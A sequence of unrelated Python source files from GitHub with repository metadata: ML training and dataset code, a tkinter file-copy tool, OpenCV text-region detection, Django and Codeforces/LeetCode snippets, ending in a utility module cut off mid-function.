    parser.add_argument("--checkpoint", type=str, default=None)
    parser.add_argument("--config", type=str, default=None)
    args = parser.parse_args()
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

    config = None
    if args.config is not None:
        # Context manager: the original leaked the open() file handle.
        with open(args.config) as f:
            config = Config(**json.load(f))

    start_epoch = 0
    step = 0
    optimizer_state_dict = None
    if args.checkpoint is not None:
        qclip, clip_model, config, start_epoch, step, optimizer_state_dict = \
            load_checkpoint(args.checkpoint, config, device)
    else:
        if config is None:
            # Bug fix: with neither flag supplied, generate_model(None)
            # previously crashed with an opaque AttributeError.
            parser.error("either --config or --checkpoint must be provided")
        qclip, clip_model = generate_model(config, device)

    train, val, test = get_datasets(config, clip_model)
    tracker = WandBTracker(
        "QuestionContext",
        config.run.run_name,
        report_train_loss_every=1,
        run_id=config.run.resume_id,
        config=config,
    )
    trainer = Trainer(
        train,
        val,
        test,
        qclip,
        config,
        tracker=tracker,
        shuffle=True
    )
    if args.checkpoint is not None:
        trainer.load_optimizer_state_dict(optimizer_state_dict)
        tracker.step = step
    print("Training with config:")
    print(config.json(indent=4))
    trainer.train(
        epochs=config.run.epochs,
        start_epoch=start_epoch,
        train_sample_limit=config.run.train_sample_limit,
        val_sample_limit=config.run.val_sample_limit,
        test_out_of=config.run.test_out_of,
        test_sample_limit=config.run.test_sample_limit,
    )


if __name__ == "__main__":
    main()
Veldrovive/QuestionContext
main.py
main.py
py
10,429
python
en
code
0
github-code
36
6703674654
import os, shutil
from datetime import datetime, timedelta
from tkinter import *
import tkinter as tk
from tkinter import filedialog, messagebox, ttk
import sqlite3


def load_gui(self):
    """Create and lay out all widgets on the master window, then show the
    stored copy history from the sqlite database."""
    self.lbl_origin = tk.Label(self.master, bg="silver", text="Origin directory: ")
    self.lbl_origin.grid(row=0, column=0, padx=(20, 0), pady=(10, 0), sticky=N+W)
    self.lst_origin = Listbox(self.master, width=40, height=8)
    self.lst_origin.grid(row=1, column=0, columnspan=3, padx=(20, 0), pady=(10, 0), sticky=N+W)
    self.lbl_dest = tk.Label(self.master, bg="silver", text="Destination directory: ")
    self.lbl_dest.grid(row=2, column=0, padx=(20, 0), pady=(10, 0), sticky=N+W)
    self.lst_dest = Listbox(self.master, width=40, height=8)
    self.lst_dest.grid(row=3, column=0, padx=(20, 0), pady=(10, 0), sticky=N+W)
    self.btn_open = tk.Button(self.master, width=25, height=2, text="Open Origin",
                              command=lambda: open_file(self))
    self.btn_open.grid(row=1, column=1, padx=(20, 20), pady=(10, 0), sticky=N+W)
    self.btn_dest = tk.Button(self.master, width=25, height=2, text="Open Destination",
                              command=lambda: dest_file(self))
    self.btn_dest.grid(row=1, column=1, padx=(20, 20), pady=(60, 0), sticky=N+W)
    # Copy stays disabled until a destination directory has been chosen.
    self.btn_copy = tk.Button(self.master, width=25, height=2, text="Copy",
                              command=lambda: copy_file(self))
    self.btn_copy.configure(state=DISABLED)
    self.btn_copy.grid(row=1, column=1, padx=(20, 20), pady=(110, 0), sticky=N+E)
    # NOTE(review): self.btn_open is rebound here, orphaning the reference to
    # the "Open Origin" button above; harmless since only the widget needs to
    # stay alive, but worth confirming it is intentional.
    self.btn_open = tk.Button(self.master, width=25, height=2, text="Clear",
                              command=lambda: clear_box(self))
    self.btn_open.grid(row=3, column=1, padx=(20, 20), pady=(50, 0), sticky=N+W)
    self.btn_close = tk.Button(self.master, width=25, height=2, text="Close",
                               command=lambda: close_window(self))
    self.btn_close.grid(row=3, column=1, padx=(20, 20), pady=(100, 0), sticky=N+E)
    create_db()
    get_db(self)


def open_file(self):
    """Handle the Open Origin button: pick a folder and list the files
    new or modified since the last recorded copy."""
    # Global so dest_file/copy_file can reach the same selection without
    # re-opening the file dialog.
    global src_folder
    clear_box(self)
    create_db()
    src_folder = filedialog.askdirectory()
    if src_folder == '':
        # NOTE(review): after the re-prompt the function returns without
        # listing files even on a valid second pick — kept as-is.
        messagebox.showwarning("Invalid Selection", "Please pick a valid directory.")
        src_folder = filedialog.askdirectory()
    else:
        folder_name = get_folder(src_folder)
        or_text = "Origin directory: " + folder_name
        self.lbl_origin.configure(text=or_text)
        get_data = get_db(self)
        files = get_files(src_folder, get_data)
        if len(files) == 0:
            self.lst_origin.insert(END, "No new or modified files")
        else:
            # List every file changed since the last recorded check.
            [self.lst_origin.insert(END, file) for file in files]


def dest_file(self):
    """Handle the Open Destination button: pick the copy target folder and
    enable the Copy button."""
    global dest_folder
    dest_folder = filedialog.askdirectory()
    if dest_folder == '':
        messagebox.showwarning("Invalid Selection", "Please pick a valid directory.")
        dest_folder = filedialog.askdirectory()
    folder_name = get_folder(dest_folder)
    dest_text = "Destination directory: " + folder_name
    self.lbl_dest.configure(text=dest_text)
    self.btn_copy.configure(state=ACTIVE)


def get_folder(folder):
    """Return a shortened "root/.../leaf" display form of a folder path."""
    listA = folder.split('/')
    return str(listA[0]) + "/.../" + str(listA[len(listA) - 1])


def get_files(folder, time):
    """Return the files in *folder* modified after *time*.

    *time* is 0 when no previous check is recorded (return every file),
    otherwise a datetime of the last recorded check.
    """
    # Bug fix: the original ignored the *folder* parameter and always read
    # the global src_folder.  Both call sites pass src_folder, so behavior
    # is unchanged for them.
    files = os.listdir(folder)
    c_files = []
    for file in files:
        path = folder + '/' + file
        # Modification time of the file, as a POSIX timestamp.
        m_time = os.path.getmtime(path)
        if time == 0:
            c_files.append(file)
        elif datetime.fromtimestamp(m_time) > time:
            c_files.append(file)
    return c_files


def copy_file(self):
    """Copy every new/modified file from the origin to the destination and
    record the session in the database."""
    data = []
    # One timestamp identifies this whole copy session in the database.
    time_id = round(datetime.today().timestamp())
    get_data = get_db(self)
    files = get_files(src_folder, get_data)
    clear_box(self)
    for file in files:
        path = os.path.join(src_folder, file)
        dst = os.path.join(dest_folder, file)
        if path == dst:
            messagebox.showwarning(
                "Invalid Selection",
                "Origin and Destination folders are the same! \nPlease pick a valid directory.")
        else:
            shutil.copy(path, dst)
            data.append([time_id, file])
    self.btn_copy.configure(state=DISABLED)
    insert_db(data)
    get_db(self)


def clear_box(self):
    """Reset both list boxes and labels to their initial state."""
    self.btn_copy.configure(state=DISABLED)
    self.lst_origin.delete(0, END)
    self.lst_dest.delete(0, END)
    self.lbl_origin.configure(text="Origin directory: ")
    self.lbl_dest.configure(text="Destination directory: ")


def close_window(self):
    """Confirm with the user, then tear down the window and exit."""
    if messagebox.askokcancel("Exit program", "Okay to exit application"):
        # Bug fix: the original referenced self.master.destroy without
        # calling it, so the window was never destroyed.
        self.master.destroy()
        # Hard exit keeps any lingering tkinter callbacks from running.
        os._exit(0)


def create_db():
    """Create the history table if it does not exist yet."""
    conn = sqlite3.connect('copyfiles.db')
    with conn:
        cur = conn.cursor()
        cur.execute("CREATE TABLE if not exists tbl_savetime(\
            ID INTEGER PRIMARY KEY AUTOINCREMENT, \
            col_timeid INTEGER, \
            col_filename TEXT);")
        conn.commit()
    conn.close()


def insert_db(data):
    """Insert the copied filenames with their session timestamp."""
    conn = sqlite3.connect('copyfiles.db')
    with conn:
        cur = conn.cursor()
        for item in data:
            cur.execute("""INSERT INTO tbl_savetime (col_timeid, col_filename)
                        VALUES (?,?)""", (item[0], item[1]))
        conn.commit()
    conn.close()


def get_db(self):
    """Show the last copy session in the destination list box and return
    the timestamp of the last check (0 when nothing was copied yet)."""
    conn = sqlite3.connect('copyfiles.db')
    cur = conn.cursor()
    cur.execute("""SELECT MAX(ID) AS ID, col_timeid, col_filename
                FROM tbl_savetime""")
    r_data = cur.fetchall()
    updated_time = r_data[0][1]
    if updated_time is None:
        # MAX(ID) on an empty table yields a single all-NULL row.
        self.lst_dest.insert(END, "No files copied yet!")
        r_time = 0
    else:
        r_time = datetime.fromtimestamp(updated_time)
        date = r_time.strftime('%B %d, %Y')
        time = r_time.strftime('%I:%M%p')
        self.lst_dest.insert(1, "Last file check: ")
        self.lst_dest.insert(2, "Date: {}".format(date))
        self.lst_dest.insert(3, "Time: {}".format(time))
        self.lst_dest.insert(4, "Files updated: ")
        # Parameterized query instead of str.format interpolation into SQL.
        cur.execute("""SELECT col_filename FROM tbl_savetime
                    WHERE col_timeid = ?""", (updated_time,))
        c_data = cur.fetchall()
        [self.lst_dest.insert(5, item[0]) for item in c_data]
    conn.close()
    return r_time
sajibhaskaran/Python_drills
PyDrill_db/modified_files_gui.py
modified_files_gui.py
py
7,843
python
en
code
0
github-code
36
21664219940
""" Receive an image - Global binarize image - Find word (connected component RETR_BOUNDARY) - Find Rectilinear Polygon Return an list of points in order """ import cv2 import numpy as np import sys import matplotlib.pyplot as plt PADDING = 2 def binarize(img): gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) _, bin_img = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU) return bin_img def bbox_words(bin_img): contours = cv2.findContours(bin_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] list_bboxes = [] for contour in contours: x, y, w, h = cv2.boundingRect(contour) list_bboxes.append((x-PADDING, y-PADDING, w+2*PADDING, h+2*PADDING)) return list_bboxes def draw_region(img, x1, y1, x2, y2): h, w = img.shape[:2] x1 = max(0, x1) y1 = max(0, y1) x2 = min(x2, w) y2 = min(y2, h) cv2.rectangle(img, (x1, y1), (x2, y2), 255, -1) def merge_words_2_line(bin_img, list_bboxes): list_bboxes.sort(key = lambda bbox: bbox[1]) cnt = len(list_bboxes) for i in range(len(list_bboxes)): for j in range(len(list_bboxes)): x1, y1, w1, h1 = list_bboxes[i] x2, y2, w2, h2 = list_bboxes[j] if y1 <= y2 and 2 * (y1 + h1 - y2) >= 0.5 * (h1 + h2): x_left, x_right = min(x1, x2), max(x1 + w1, x2 + w2) y_left, y_right = min(y1, y2), max(y1 + h1, y2 + h2) list_bboxes[i] = x_left, y_left, x_right - x_left, y_right - y_left list_bboxes[j] = x_left, y_left, x_right - x_left, y_right - y_left highlight_img = bin_img.copy() for i in range(cnt): x, y, w, h = list_bboxes[i] draw_region(highlight_img, x, y, x + w, y + h) cv2.imwrite('line.png', highlight_img) contours = cv2.findContours(highlight_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] return contours def merge_lines_2_paragraph(bin_img, contours): cnt = len(contours) highlight_img = bin_img.copy() cv2.drawContours(highlight_img, contours, -1, 255, -1) # for contour in contours: # x, y, w, h = cv2.boundingRect(contour) # draw_region(highlight_img, x, y, x + w, y + h) for contour_1 in contours: for contour_2 in contours: x1, 
y1, w1, h1 = cv2.boundingRect(contour_1) x2, y2, w2, h2 = cv2.boundingRect(contour_2) if (x1 != x2 or y1 != y2) and (y1 < y2 and y1 + h1 + h1//4 >= y2 - h2//4): x_left = max(x1, x2) x_right = min(x1 + w1, x2 + w2) if x_left < x_right: draw_region(highlight_img, x_left, y1 + h1, x_right, y2) contours = cv2.findContours(highlight_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] if (len(contours) == 0): return [] idx = -1 for i in range(len(contours)): if idx == -1 or cv2.contourArea(contours[idx]) < cv2.contourArea(contours[i]): idx = i epsilon = 0.001*cv2.arcLength(contours[idx], True) approx = cv2.approxPolyDP(contours[idx], epsilon, True) highlight_img = bin_img.copy() for i in range(len(approx)): j = (i + 1) % len(approx) cv2.line(highlight_img, (approx[i][0][0], approx[i][0][1]), (approx[j][0][0], approx[j][0][1]), 255) cv2.imwrite('highlight.png', highlight_img) return [(approx[i][0][0], approx[i][0][1]) for i in range(len(approx))] def main(img): cv2.imwrite('crop.png', img) bin_img = binarize(img) list_bboxes = bbox_words(bin_img) line_contours = merge_words_2_line(bin_img, list_bboxes) return merge_lines_2_paragraph(bin_img, line_contours) if __name__ == '__main__': img_path = sys.argv[1] img = cv2.imread(img_path) print(main(img))
qcuong98/clabel
rectilinear_polygon.py
rectilinear_polygon.py
py
3,815
python
en
code
0
github-code
36
28932021496
from django.shortcuts import render, redirect

# NOTE(review): implicit-relative import; on Python 3 / modern Django this
# must be "from .models import Book" — confirm the project's Python version
# before changing it.
from models import Book


def index(request):
    """Render the book list page."""
    # Bug fix: the original assigned the bound method (Book.objects.all
    # with no parentheses) instead of executing the query.  Django templates
    # call callables implicitly, which masked the mistake.
    books = Book.objects.all()
    context = {
        'books': books
    }
    return render(request, 'app/index.html', context)


def process(request):
    """Create a Book from the submitted form and return to the index."""
    if request.method == "POST":
        Book.objects.create(
            title=request.POST['title'],
            category=request.POST['category'],
            author=request.POST['author'],
        )
    # Redirect unconditionally: a Django view must always return an
    # HttpResponse, and the original returned None on non-POST requests.
    return redirect('/')
melissaehong/AllProjects
Python/django/fullstackbooks/apps/app/views.py
views.py
py
460
python
en
code
1
github-code
36
37244411947
# -*- coding: utf-8 -*-
"""
CAD120 data reader that is compatible with QSRlib.

Python 2 module (uses ConfigParser/cPickle): loads CAD120 world traces,
asks QSRlib to compute a chosen QSR over every trace, and can pickle or
reload the resulting QSR traces.

:Author: Yiannis Gatsoulis <y.gatsoulis@leeds.ac.uk>
:Organization: University of Leeds
"""

from __future__ import print_function, division

import sys
import argparse
import timeit
import ConfigParser
import os
try:
    # cPickle is the fast C implementation on Python 2.
    import cPickle as pickle
except ImportError:
    import pickle

from cad120_data_reader import CAD120_Data_Reader
from qsrlib.qsrlib import QSRlib, QSRlib_Request_Message


class CAD120_QSR_Keeper(object):
    """Holds QSR traces for the CAD120 dataset.

    Either computes them (reader + qsrlib + which_qsr must be supplied)
    or restores them from a previously pickled file (load_from_file).
    """

    def __init__(self, description="", reader=None, qsrlib=None, which_qsr="", load_from_file=""):
        # :param description: free-text label stored alongside the traces
        # :param reader: CAD120_Data_Reader providing world_traces
        # :param qsrlib: QSRlib instance used to compute the QSRs
        # :param which_qsr: QSRlib name of the QSR to compute
        # :param load_from_file: when non-empty, load pickled traces instead
        #     of computing them (relative to $CLOUD when that env var is set)
        start = timeit.default_timer()
        print("\n--", self.__class__.__name__)
        print("Generating QSRs...")
        cloud_path = os.environ.get("CLOUD")
        self.description = description
        self.reader = reader
        self.qsrlib = qsrlib
        self.which_qsr = which_qsr
        # Maps trace key -> QSRlib response for that world trace.
        self.world_qsr_traces = {}
        if load_from_file is not None and load_from_file != "":
            if cloud_path is not None:
                load_from_file = os.path.join(cloud_path, load_from_file)
            self.load(load_from_file)
        else:
            # Fail fast on wrong arguments before doing any heavy work.
            if type(self.reader) is not CAD120_Data_Reader:
                raise TypeError("Provide a CAD120_Data_Reader object")
            if type(self.qsrlib) is not QSRlib:
                raise TypeError("Provide a QSRlib object")
            if self.which_qsr == "":
                raise ValueError("Provide an appropriate QSR")
            self.make()
        stop = timeit.default_timer()
        print("QSRs generated in: %.2f secs" % (stop - start))

    def make(self, qsrlib=None):
        """Compute the QSR for every world trace held by the reader.

        :param qsrlib: optional QSRlib instance overriding the stored one
        """
        if qsrlib:
            self.qsrlib = qsrlib
        if self.qsrlib is None:
            raise TypeError("Pass a QSRlib object")
        for k, world_trace in zip(self.reader.world_traces.keys(), self.reader.world_traces.values()):
            request_message = QSRlib_Request_Message(which_qsr=self.which_qsr,
                                                     input_data=world_trace,
                                                     include_missing_data=True)
            # out = self.qsrlib.request_qsrs(request_message=request_message)
            self.world_qsr_traces[k] = self.qsrlib.request_qsrs(request_message=request_message)

    def save(self, filename):
        """Pickle description, QSR name and all QSR traces to *filename*."""
        print("Saving...")
        foo = {"description": self.description,
               "which_qsr": self.which_qsr,
               "world_qsr_traces": self.world_qsr_traces}
        with open(filename, "wb") as f:
            pickle.dump(foo, f)
        print("\t\tdone")

    def load(self, filename):
        """Restore description, QSR name and traces from a pickle file.

        NOTE(review): pickle.load on an untrusted file can execute
        arbitrary code — only load files this tool produced itself.
        """
        print("Loading QSRs from", filename, end="")
        with open(filename, "rb") as f:
            foo = pickle.load(f)
        self.description = foo["description"]
        self.which_qsr = foo["which_qsr"]
        self.world_qsr_traces = foo["world_qsr_traces"]
        print("\t\tdone")


if __name__ == '__main__':
    start = timeit.default_timer()
    # CLI alias -> QSRlib QSR name.
    options = {"sg1": "sg1", "rcc3": "rcc3_rectangle_bounding_boxes_2d"}
    parser = argparse.ArgumentParser(description="CAD120 QSR keeper in QSRlib format")
    parser.add_argument("-i", "--ini", help="ini file", required=True)
    # Exactly one of --load / --qsr must be given.
    parser_group = parser.add_mutually_exclusive_group(required=True)
    parser.add_argument("-s", "--save", help="filename to save qsrs", type=str)
    # parser_group.add_argument("-l", "--load", help="ini file that holds the qsrs filename, qsrs loaded from that file instead of being created from data", type=str)
    parser_group.add_argument("-l", "--load", dest="load", action="store_true",
                              help="load the data qsrs the file in 'config.ini'")
    parser_group.add_argument("--qsr", help="choose qsr: %s" % options.keys(), type=str)
    args = parser.parse_args()
    # When $INIS is set, the ini file is resolved relative to it.
    inis_path = os.environ.get("INIS")
    ini = os.path.join(inis_path, "strands_data_to_qsrlib", str(args.ini)) if inis_path else args.ini
    cfg = ConfigParser.SafeConfigParser()
    # cfg.read returns the list of files successfully parsed.
    if len(cfg.read(ini)) == 0:
        raise IOError(str(ini) + " not found")
    if not args.load:
        # Compute-from-data path: requires reader_load flag and a valid QSR.
        try:
            reader_load = cfg.getboolean("cad120_data_keeper", "reader_load")
        except ConfigParser.NoOptionError:
            raise
        try:
            which_qsr = options[args.qsr]
        except (IndexError, KeyError) as e:
            # Unknown (or missing) --qsr alias: show usage and bail out.
            parser.print_help()
            sys.exit(1)
        qsrlib = QSRlib()
        reader = CAD120_Data_Reader(config_filename=ini, load_from_files=reader_load)
        print()
        keeper = CAD120_QSR_Keeper(description="description",
                                   reader=reader,
                                   qsrlib=qsrlib,
                                   which_qsr=which_qsr)
        # optional saving
        if args.save:
            keeper.save(filename=args.save)
    else:
        # Load path: the qsrs filename comes from the ini file.
        try:
            qsrs_filename = cfg.get("cad120_data_keeper", "qsrs_filename")
        except ConfigParser.NoOptionError:
            raise
        keeper = CAD120_QSR_Keeper(load_from_file=qsrs_filename)
    stop = timeit.default_timer()
    print("Total execution time: %.2f secs" % (stop - start))
gatsoulis/strands_data_to_qsrlib
src/cad120/cad120_qsr_keeper.py
cad120_qsr_keeper.py
py
4,946
python
en
code
0
github-code
36
70846797543
from pymongo import MongoClient
from datetime import datetime
import os, sys

# Make the backend package importable when running this script directly.
sys.path.append(os.path.join(os.path.dirname(sys.path[0]), 'backend'))
import Model
import Repository as repo


def make_seats(secL, secH, rowL, rowH, seatL, seatH, secI=1, rowI=1, seatI=1):
    """Build seat labels "sec{s}row{r}seat{t}" for every combination of
    section, row and seat over the given half-open ranges with strides."""
    return [
        f"sec{sec}row{row}seat{seat}"
        for sec in range(secL, secH, secI)
        for row in range(rowL, rowH, rowI)
        for seat in range(seatL, seatH, seatI)
    ]


# Seat layouts for the three sample events.
sb_seats = make_seats(100, 401, 1, 5, 1, 8, secI=100)
pres_seats = make_seats(1, 2, 1, 30, 1, 6)
yesterday_seats = make_seats(1, 2, 1, 2, 1, 2)

# Three demo events to seed the database with.
suberbowl = Model.Event({'start_time': datetime(2020, 2, 2, 19, 0, 0),
                         'team1': "Jets",
                         'team2': "Bengals",
                         'location': "Miami, FL",
                         'event_type': "NFL",
                         'period_count': 4,
                         'seats': sb_seats,
                         'event_name': "Suberb Owl"})
my_393_presentation = Model.Event({'start_time': datetime(2019, 12, 6, 11, 40, 0),
                                   'team1': "us",
                                   'team2': "Rohan & Anthony",
                                   'location': "Bingham",
                                   'event_type': "Presentation",
                                   'period_count': 4,
                                   'seats': pres_seats,
                                   'event_name': "My 393 Presentation"})
yesterday = Model.Event({'start_time': datetime(2019, 12, 3, 0, 0, 0),
                         'team1': "today",
                         'team2': "tomorrow",
                         'location': "Yes",
                         'event_type': "Life",
                         'period_count': 1,
                         'seats': yesterday_seats,
                         'event_name': "Yesterday"})

for event in (suberbowl, my_393_presentation, yesterday):
    repo.add_event(event)

# print current events and ID's for convenience
print('Events currently in database:')
for event in repo.get_all_events():
    print(f'Event name: {event.event_name}, ID: {event._id}')
DannyBarbaro/SeatSwap
db_code/EventCreator.py
EventCreator.py
py
1,618
python
en
code
0
github-code
36
27894883857
def articulation_points_util(graph, u, visited, disc, low, parent, time, result):
    """DFS from *u* computing discovery/low-link times; cut vertices are
    added to *result* (a set, so a vertex qualifying via several children
    is recorded once).

    graph is an adjacency matrix; time is a one-element list used as a
    mutable DFS clock.
    """
    visited[u] = True
    disc[u] = time[0]
    low[u] = time[0]
    time[0] += 1
    children = 0
    for v, w in enumerate(graph[u]):
        if w:
            if v == parent[u]:
                continue
            elif visited[v]:
                # Back edge: u can reach an ancestor discovered at disc[v].
                low[u] = min(low[u], disc[v])
            else:
                children += 1
                parent[v] = u
                articulation_points_util(graph, v, visited, disc, low, parent, time, result)
                low[u] = min(low[u], low[v])
                # Non-root u is a cut vertex when some child's subtree
                # cannot reach strictly above u.
                if parent[u] != -1 and low[v] >= disc[u]:
                    result.add(u)
    # A DFS root is a cut vertex iff it has two or more DFS children.
    if parent[u] == -1 and children > 1:
        result.add(u)


def articulation_points(graph):
    """Return the articulation points of an undirected graph, sorted.

    graph: adjacency matrix (list of lists of 0/1).  Works on disconnected
    graphs; returns [] for graphs with no cut vertices.
    """
    n = len(graph)
    # A set instead of a list: the original appended a vertex once per
    # qualifying DFS child, producing duplicates.
    result = set()
    visited = [False for _ in range(n)]
    parent = [-1 for _ in range(n)]
    disc = [float('inf') for _ in range(n)]
    low = [float('inf') for _ in range(n)]
    time = [0]
    for i in range(n):
        # Bug fix: the original restarted the DFS from every vertex,
        # re-entering visited nodes and clobbering their disc/low values.
        if not visited[i]:
            articulation_points_util(graph, i, visited, disc, low, parent, time, result)
    return sorted(result)


if __name__ == "__main__":
    graph = [
        [0, 1, 1, 0, 0],
        [1, 0, 1, 0, 0],
        [1, 1, 0, 1, 1],
        [0, 0, 1, 0, 1],
        [0, 0, 1, 1, 0],
    ]
    print(articulation_points(graph))
stgleb/algorithms-and-datastructures
graphs/articulation_points.py
articulation_points.py
py
1,325
python
en
code
0
github-code
36
3721701885
import environ
from io import BytesIO
from PIL import Image, ImageFilter

env = environ.Env()
FILTERED_FILES = env('FILTERED_FILES', default='process_service/tmp/filtered')

# Public method name -> PIL.ImageFilter attribute name.
# (Defined before filter() for readability; it is looked up at call time.)
filt_obj = {
    "blur": "BLUR",
    "contour": "CONTOUR",
    "detail": "DETAIL",
    "edge_enhance": "EDGE_ENHANCE",
    "emboss": "EMBOSS",
    "find_edges": "FIND_EDGES",
    "sharpen": "SHARPEN",
    "smooth": "SMOOTH",
}


def filter(file, filename, ext, method='blur', is_file=False):
    """Apply a PIL ImageFilter to an image and save it under FILTERED_FILES.

    :param file: an open file object (is_file=True) or raw image bytes
    :param filename: base name used to build the output name
    :param ext: output file extension
    :param method: one of the filt_obj keys ('blur', 'contour', ...)
    :param is_file: whether *file* is a file object rather than bytes
    :return: the saved filename, or None when PIL cannot process the input

    Raises ValueError for an unknown *method*; the original passed None to
    getattr and crashed with an opaque TypeError instead.
    """
    filt = filt_obj.get(method)
    if filt is None:
        raise ValueError("unknown filter method: %r" % (method,))
    Filter = getattr(ImageFilter, filt)
    try:
        img = Image.open(file) if is_file else Image.open(BytesIO(file))
        img = img.filter(Filter)
        # NOTE(review): these two f-strings reached us with anonymized
        # "(unknown)" placeholders; saving as "<filename>_filtered.<ext>"
        # under FILTERED_FILES is the obvious reconstruction — confirm
        # against the service that consumes the output.
        filename = f'{filename}_filtered.{ext}'
        img.save(f'{FILTERED_FILES}/{filename}')
        return filename
    except OSError as e:
        print("Cannot filter this file", filename)
        print(e)
olacodes/prog-image
process_service/filtering/filter.py
filter.py
py
875
python
en
code
1
github-code
36
22153329187
# Codeforces: "Add Odd or Subtract Even".
# Each move either adds an odd number or subtracts an even number.
# Minimum moves to turn a into b, with diff = b - a:
#   diff == 0            -> 0
#   diff > 0 and odd     -> 1 (add the odd diff)
#   diff > 0 and even    -> 2
#   diff < 0 and even    -> 1 (subtract the even |diff|)
#   diff < 0 and odd     -> 2
# (The original kept a second, dead copy of this logic inside a module-level
# triple-quoted string; it has been removed.)
for _ in range(int(input())):
    a, b = map(int, input().split())
    diff = b - a
    if diff == 0:
        answer = 0
    elif (diff > 0) == (diff % 2 == 1):
        # Python's % is non-negative here, so a negative even diff gives
        # diff % 2 == 0: positive-and-odd or negative-and-even => one move.
        answer = 1
    else:
        answer = 2
    print(answer)
saurav912/Codeforces-Problemset-Solutions
CDFAddOddorSubtractEven.py
CDFAddOddorSubtractEven.py
py
658
python
en
code
0
github-code
36
20832740847
import awkward as ak
from pocket_coffea.lib.cut_definition import Cut


def dilepton(events, params, year, sample, **kwargs):
    """Boolean per-event mask for the opposite-sign dilepton preselection.

    Requires exactly two good leptons forming an opposite-sign pair, a
    leading-lepton pt threshold, minimum jet/b-jet counts and a MET cut.
    All thresholds come from *params*; the MET collection name is resolved
    per data-taking *year* via params["METbranch"].

    The original also computed same-flavor (SF) masks that were never used
    in the final selection; those dead computations have been removed.
    """
    MET = events[params["METbranch"][year]]

    # Opposite-sign dilepton pair (pair charge sums to zero).
    OS = events.ll.charge == 0

    mask = (
        (events.nLeptonGood == 2)
        & (ak.firsts(events.LeptonGood.pt) > params["pt_leading_lepton"])
        & (events.nJetGood >= params["njet"])
        & (events.nBJetGood >= params["nbjet"])
        & (MET.pt > params["met"])
        & OS
    )

    # ak.firsts yields None for events without leptons; such events fail.
    return ak.where(ak.is_none(mask), False, mask)


dilepton_presel = Cut(
    name="dilepton",
    params={
        # MET collection name per data-taking era.
        "METbranch": {
            '2016_PreVFP': "MET",
            '2016_PostVFP': "MET",
            '2017': "MET",
            '2018': "MET",
        },
        "njet": 2,
        "nbjet": 0,
        "pt_leading_lepton": 15,
        "met": 10,
    },
    function=dilepton,
)
ryanm124/AnalysisConfigs
configs/ttHbb/custom_cut_functions.py
custom_cut_functions.py
py
1,172
python
en
code
null
github-code
36
72219406185
import math
import os.path
from os.path import join
import random

import torch
from torch.utils.data import DataLoader, Dataset
from typing import Dict, AnyStr, Any
from torchvision.transforms import transforms

from .image_folder import is_image_file, make_dataset
from PIL import Image
import numpy as np
from PIL import ImageFile

# Some frames on disk are truncated; let PIL load them anyway.
ImageFile.LOAD_TRUNCATED_IMAGES = True

# Shared jitter + tensor conversion applied to BOTH the image and the label.
# NOTE(review): ColorJitter on a categorical label map looks unintended —
# confirm before relying on the label values downstream.
to_tensor = transforms.Compose([
    transforms.ColorJitter(brightness=0.5, contrast=0.5, saturation=0.5, hue=0.5),
    transforms.ToTensor()])


class GTA5Dataset(Dataset):
    """Paired (image, label, basename) dataset over a GTA5-style layout:
    <root>/images/* with labels of the same file name in <root>/labels/*.
    """

    def __init__(self, root, size=None, is_round=True, downsample=1, ext="png", resize=None):
        """
        :param root: dataset root containing "images" and "labels" folders
        :param size: optional cap on the dataset length
        :param is_round: stored but currently unused
        :param downsample: unused; kept so existing call sites still work
        :param ext: unused; kept so existing call sites still work
        :param resize: optional (w, h) applied after the fixed 640x480 resize
        """
        super(GTA5Dataset, self).__init__()
        self.root = root
        self.origin_path = sorted(make_dataset(self.root + "/images/"))
        self.origin_size = len(self.origin_path)
        self.round = is_round
        self.patch_size = 256  # currently unused
        self.resize = resize
        # Never claim more samples than there are files on disk.
        if size is None:
            self.size = len(self.origin_path)
        else:
            self.size = min(size, len(self.origin_path))

    def __len__(self) -> int:
        return self.size

    def __getitem__(self, index: int) -> Dict[AnyStr, Any]:
        """Return (image_tensor, label_tensor, basename) for sample *index*."""
        # Bug fix: the original checked "index > self.size", silently
        # letting index == self.size through the guard.
        if index >= self.size:
            raise IndexError("out of the range, indexed %d-th image, but have %d images in total." % (index, self.size))
        paths = self.origin_path[index]
        org_input = Image.open(paths).convert("RGB").resize((640, 480))
        # Labels live in a parallel "labels" directory with identical names.
        edge_input = Image.open(paths.replace("images", "labels")).convert("RGB").resize((640, 480))
        if self.resize is not None:
            org_input, edge_input = org_input.resize(self.resize), edge_input.resize(self.resize)
        # Basename without extension, e.g. ".../00001.png" -> "00001".
        return to_tensor(org_input), \
               to_tensor(edge_input), \
               "".join(self.origin_path[index % self.origin_size].split('/')[-1].split(".")[:-1])
leelxh/Adaptive-Texture-Filtering-for-Single-Domain-Generalized-Segmentation
texture_filter/datasets/smoothing_dataset.py
smoothing_dataset.py
py
1,899
python
en
code
5
github-code
36
21189060933
class Solution:
    def countBits(self, n: int) -> List[int]:
        """Return a list where entry i is the number of 1-bits in i, for
        every i from 0 through n (inclusive)."""
        # DP over halving: i has the same bits as i >> 1, plus its own
        # lowest bit (i & 1).  Produces the same values as the classic
        # i & (i - 1) recurrence.
        counts = [0] * (n + 1)
        for value in range(1, n + 1):
            counts[value] = counts[value >> 1] + (value & 1)
        return counts
KimGiii/Algorithm
0338-counting-bits/0338-counting-bits.py
0338-counting-bits.py
py
438
python
ko
code
0
github-code
36
12040540403
import os, sys, logging, glob2, csv import numpy as np import pandas as pd from sklearn.metrics.pairwise import cosine_similarity def create_directory(name): """ Create directory if not exists Parameters ---------- name : string name of the folder to be created """ try: if not os.path.exists(name): os.makedirs(name) logging.info('Created directory: {}'.format(name)) except Exception(e): logging.error("[{}] : {}".format(sys._getframe().f_code.co_name,e)) def read_directory(directory): """ Read file names from directory recursively Parameters ---------- directory : string directory/folder name where to read the file names from Returns --------- files : list of strings list of file names """ try: return glob2.glob(os.path.join(directory, '**' , '*.*')) except Exception(e): logging.error("[{}] : {}".format(sys._getframe().f_code.co_name,e)) def save_csv(data, name, folder): """ Save list of list as CSV (comma separated values) Parameters ---------- data : list of list A list of lists that contain data to be stored into a CSV file format name : string The name of the file you want to give it folder: string The folder location """ try: # create folder name as directory if not exists create_directory(folder) # create the path name (allows for .csv and no .csv extension to be handled correctly) suffix = '.csv' 